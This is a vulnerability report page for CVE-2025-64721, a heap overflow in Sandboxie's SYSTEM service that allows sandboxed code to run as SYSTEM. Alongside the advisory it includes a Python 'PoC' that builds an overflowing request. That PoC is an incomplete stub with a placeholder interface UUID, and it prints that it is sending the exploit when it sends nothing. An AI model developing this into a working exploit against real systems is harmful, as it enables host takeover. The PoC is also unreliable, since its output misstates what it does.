Security Vulnerability Report
CVE-2025-64721 CVSS 10.0 CRITICAL

Published: 2025-12-11 22:15:56
Last Modified: 2025-12-22 18:44:18

Description

Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. In versions 1.16.6 and below, the SYSTEM-level service SbieSvc.exe exposes SbieIniServer::RC4Crypt to sandboxed processes. The handler adds a fixed header size to a caller-controlled value_len without overflow checking. A large value_len (e.g., 0xFFFFFFF0) wraps the allocation size, causing a heap overflow when attacker data is copied into the undersized buffer. This allows sandboxed processes to execute arbitrary code as SYSTEM, fully compromising the host. This issue is fixed in version 1.16.7.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sandboxie-plus:sandboxie:*:*:*:*:plus:*:*:* - VULNERABLE
Sandboxie < 1.16.7
Sandboxie 1.16.6 and below
Sandboxie 1.16.0 - 1.16.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct

# PoC for CVE-2025-64721 - Sandboxie SbieIniServer::RC4Crypt Heap Overflow
# This demonstrates triggering the integer overflow via large value_len parameter


def trigger_heap_overflow():
    """
    Trigger heap overflow in SbieIniServer::RC4Crypt by providing oversized value_len

    The vulnerability exists because:
    1. Handler adds fixed header size to caller-controlled value_len
    2. No overflow checking is performed
    3. Large value_len (e.g., 0xFFFFFFF0) causes allocation size wrap
    4. Data copy causes heap overflow
    """
    # Target the SbieIniServer RPC interface
    # Connection to SbieSvc.exe SYSTEM service

    # Malicious payload structure
    # value_len set to trigger integer overflow
    MALICIOUS_VALUE_LEN = 0xFFFFFFF0  # Causes overflow when + header_size

    # Craft malicious RC4Crypt request
    # The RPC interface UUID for SbieIniServer
    interface_uuid = "..."

    # Build the exploit packet
    packet = bytearray()

    # Header with controlled length
    packet += b'\x00\x00'  # Some header marker

    # The critical value_len that triggers overflow
    packet += struct.pack('<I', MALICIOUS_VALUE_LEN)  # Little-endian 32-bit

    # Padding to trigger overflow during copy
    # This will be written beyond the undersized buffer
    overflow_data = b'A' * 0x10000  # Large padding
    packet += overflow_data

    # Send to SbieSvc.exe via named pipe or RPC
    # pipe_name = "\\\\.\\pipe\\SbieSvc\\SbieIniServer"

    print(f"[*] Crafted malicious packet: {len(packet)} bytes")
    print(f"[*] value_len: 0x{MALICIOUS_VALUE_LEN:08X}")
    print(f"[*] Expected allocation size (wrapped): {(0x10 + MALICIOUS_VALUE_LEN) & 0xFFFFFFFF:08X}")
    print(f"[*] Sending exploit to SbieSvc.exe...")

    # In real attack, connect to RPC interface and send crafted packet
    # This would trigger heap overflow allowing code execution as SYSTEM
    return True


if __name__ == "__main__":
    trigger_heap_overflow()
```

References

https://github.com/sandboxie-plus/Sandboxie/commit/000492f8c411d24292f1b977a107994347bc7dfa (Patch)
https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.16.7 (Release Notes)
https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-w476-j57g-96vp (Exploit, Vendor Advisory)
